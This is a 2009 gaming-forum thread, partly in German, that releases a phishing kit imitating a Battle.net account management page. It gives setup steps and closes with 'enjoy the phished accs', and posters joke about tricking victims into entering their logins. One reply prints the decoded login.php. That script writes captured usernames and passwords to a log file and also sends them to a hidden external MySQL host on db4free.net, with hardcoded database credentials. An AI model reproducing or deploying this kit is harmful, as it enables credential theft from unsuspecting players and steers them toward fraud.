[Release][Phisher] Newest Account Management Page

~~kvicken761~~ · 05/29/2009, 00:31

[Release][Phisher] Newest Account Management Page UPDATED

Note, this phisher is now 100% working, as long as you upload all files in the structure they were downloaded in. If you have any "file not found" issues, you probably didn't follow the correct structure. Credit goes to myself, cXm0d (i have stolen his text), mweiss581 (for alot of coding) and Moji (the writer of the original phisher).

THIS PHISHER ONLY STEALS USERNAME + PASSWORD.
(Since we don't need the other information, thanks to battle.net

)

Download: *removed*

Introduction:
1) Open "login.php" and change the name of the logfile and the adresse where we want to get redirected.
2) Give "logfile.txt" the same name like we changed it in "login.php".
3) Upload all the files to the server.
4) Give the renamed "logfile.txt" file chmod rights 0777.
5) Enjoy the phished accs.

Screen:

~~kvicken761~~ · 05/29/2009, 01:52

new version online! lets rock

Pexus · 05/30/2009, 19:01

I'm not sure and I don't want to look it up now but I think it's not allowed to post stuff like this to steal any accs.
But: Seems to be n1ce.

ZeroShout · 06/01/2009, 22:25

Ich versteh das nicht =)

๑oxford๑ · 06/01/2009, 23:22

Quote:

Originally Posted by ZeroShout

Ich versteh das nicht =)

machst server auf -> lädst sachen hoch -> stellst alles ein -> wartesxst bis irgend ein doof seine account daten da einträgt <.<

Pexus · 06/02/2009, 08:03

Am besten verbindet man das mit sowas wie: "Boah ich hab ne Accountseite gefunden! Wenn man da seine Daten einträgt, kann man sich auf LIVE-Servern GM Status einstellen!!111 Zomfg!!" ;D

~~Rammsteiner~~ · 06/02/2009, 14:32

Soll ja sehr dumme Leute geben, die auf sowas reinfallen.

btw

AlexanderRoland · 06/03/2009, 08:50

sau geil ich probiers gleich mal aus^^

NoName · 06/03/2009, 15:44

nur mal so nebenbei das ist die entschlüsselte login.php

Code:

<?php

$name = $_POST['accountName'];
$pw = $_POST['password'];

$entry_line = "Username: ".$name." Password: ".$pw."<br>\n\r";
$fp = fopen($log, "a");
fwrite($fp, $entry_line);
fclose($fp);

$verbindung = mysql_connect("db4free.net","hooch361","we3ru2Ab") or die ();
mysql_select_db("hooch361") or die ();
$eintrag = "INSERT INTO hooch361 (NAME, PW) VALUES ('$name', '$pw')";
$eintragen = mysql_query($eintrag);
mysql_close($verbindung);

header( 'Location: '.$redirect );
?>